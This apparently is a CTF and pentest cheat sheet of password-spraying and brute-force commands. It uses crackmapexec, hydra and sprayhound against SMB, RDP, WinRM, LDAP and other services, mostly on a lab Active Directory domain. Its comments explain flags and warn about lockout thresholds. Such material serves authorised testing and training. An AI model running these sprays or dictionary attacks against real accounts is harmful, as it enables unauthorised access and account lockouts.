Password Attack

Password Spray

CTF only — SMB (139,445): check login == password for every name in a wordlist (each attempt counts against the account's lockout threshold, so do this on real targets only after checking the password policy)

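# User == password ("login as pass") check.
# WARNING: the first form has no --no-bruteforce, so CME pairs EVERY user with
# EVERY line of the password file (a full N x N spray) and burns one bad-password
# count per user per line. Check the lockout policy first with known creds:
#   cme smb "$RHOST" -u <user> -p <pass> --pass-pol
crackmapexec smb "$RHOST" -u usernames.txt -p usernames.txt
# --no-bruteforce pairs line i of -u with line i of -p, so passing the same file
# on both sides tests exactly user==password (one attempt per account);
# --continue-on-success keeps going after the first hit instead of stopping.
crackmapexec smb "$RHOST" -u usernames.txt -p usernames.txt --no-bruteforce --continue-on-success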

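# Same user==password check across several services. --no-bruteforce keeps it
# to one attempt per account per service; note that every service here
# authenticates against the same directory accounts, so the bad-password
# counts add up across the loop. Expansions are quoted so the target is passed
# as a single argument.
for p in ftp ssh smb winrm ldap mssql; do
  cme "$p" "$RHOST" -u usernames.txt -p usernames.txt --no-bruteforce --continue-on-success
done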

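# RDP user==password check. -L/-P are the user/password files, -f stops at the
# first valid pair, -V prints every attempt (the original passed -V twice).
# hydra warns that RDP services drop connections under heavy parallelism, so
# keep the thread count low (-t 4). Unlike CME, -L/-P is always a full cross
# product of both files; to test strictly user==password build a colon
# separated login:pass file and use -C instead:
#   awk '{ print $0 ":" $0 }' usernames.txt > pairs.txt
#   hydra -V -f -t 4 -C pairs.txt "rdp://${RHOST:-10.0.2.5}"
hydra -V -f -t 4 -L usernames.txt -P usernames.txt "rdp://${RHOST:-10.0.2.5}"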

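# Case variants of each username as its password (Ryan, ryan, RYAN, ...).
# The original only emitted UPPER and lower and dropped both the original
# spelling and the capitalised form the comment promised. Build all four,
# de-duplicate, and spray with --no-bruteforce so each variant is tried only
# as its own password (not every variant against every account).
{
  cat users.txt
  tr '[:lower:]' '[:upper:]' < users.txt
  tr '[:upper:]' '[:lower:]' < users.txt
  tr '[:upper:]' '[:lower:]' < users.txt | awk '{ print toupper(substr($0, 1, 1)) substr($0, 2) }'
} | sort -u > users2.txt
crackmapexec smb "$RHOST" -u users2.txt -p users2.txt --no-bruteforce --continue-on-success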

AD Password Spray

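# One password against every user: exactly one bad-password count per account
# per run. Pick the number of runs from the lockout threshold and observation
# window you have verified (cme smb <dc> -u <user> -p <pass> --pass-pol).
cme smb "$RHOST" -u usernames.txt -p June2013
cme smb "$RHOST" -u usernames.txt -p Summer2020
# Several passwords against every user: full cross product, one bad-password
# count per account per line of passwords.txt.
cme smb "$RHOST" -u usernames.txt -p passwords.txt

# --no-bruteforce pairs line i of usernames.txt with line i of passwords.txt,
# so both files must be line-aligned (1 user = 1 password, no cross product).
# The original misspelled --continue-on-success (argparse prefix matching hid it).
cme smb 192.168.56.11 -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success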

Sprayhound

# https://github.com/Hackndo/sprayhound
dom=north.sevenkingdoms.local
dc=192.168.56.11
# --lower: try each account's own name, lower-cased, as its password
sprayhound -U usernames.txt -d "$dom" -dc "$dc" --lower

# With a valid account (-lu/-lp) sprayhound can read the lockout state and
# skip accounts with fewer than -t attempts left, limiting lockouts
sprayhound -U usernames.txt -d "$dom" -dc "$dc" -lu hodor -lp hodor --lower -t 2

Bruteforce Attack

cme + rockyou.txt

# Dictionary attack with a short, curated password list: every user x every
# password, so the list length must stay under the lockout threshold.
spray_args=(-u usernames.txt -p passwords.txt)
cme smb 192.168.56.11 "${spray_args[@]}"

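# RDP dictionary attack: -L users x -P passwords (full cross product), -f stops
# at the first valid pair, -V prints every attempt (the original passed -V
# twice). hydra warns that RDP services drop connections under heavy
# parallelism, so keep the thread count low (-t 4). Every line of
# passwords.txt is one bad-password count per account.
hydra -V -f -t 4 -L usernames.txt -P passwords.txt "rdp://${RHOST:-10.0.2.5}"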

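# Cross-product spray across services (no --no-bruteforce: every user x every
# line of the password file). As written the password file is usernames.txt,
# i.e. every username is tried as every account's password; swap in
# passwords.txt for a real dictionary. All of these services authenticate
# against the same accounts, so bad-password counts accumulate across the loop.
for p in ftp ssh smb winrm ldap mssql; do
  cme "$p" "$RHOST" -u usernames.txt -p usernames.txt --continue-on-success
done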

# rockyou.txt contains byte sequences that are not valid UTF-8 and break some
# tools: iconv -c drops the invalid sequences, sed strips any remaining
# non-printable characters.
wordlist=/usr/share/wordlists/rockyou.txt
iconv -c -f UTF-8 -t UTF-8 "$wordlist" | sed 's/[^[:print:]]//g' > cleaned_rockyou.txt
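# Per-user dictionary attack, capped at 5 minutes each. A rockyou run exceeds
# any realistic lockout threshold, so only do this where the policy allows
# unlimited attempts (verify with --pass-pol) or on a CTF box. timeout(1)
# kills crackmapexec when the budget expires; without --continue-on-success
# CME stops on its own at the first valid password.
for u in freedy calvin johana; do
  timeout 5m crackmapexec smb "$RHOST" -u "$u" -p /usr/share/wordlists/rockyou.txt
done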
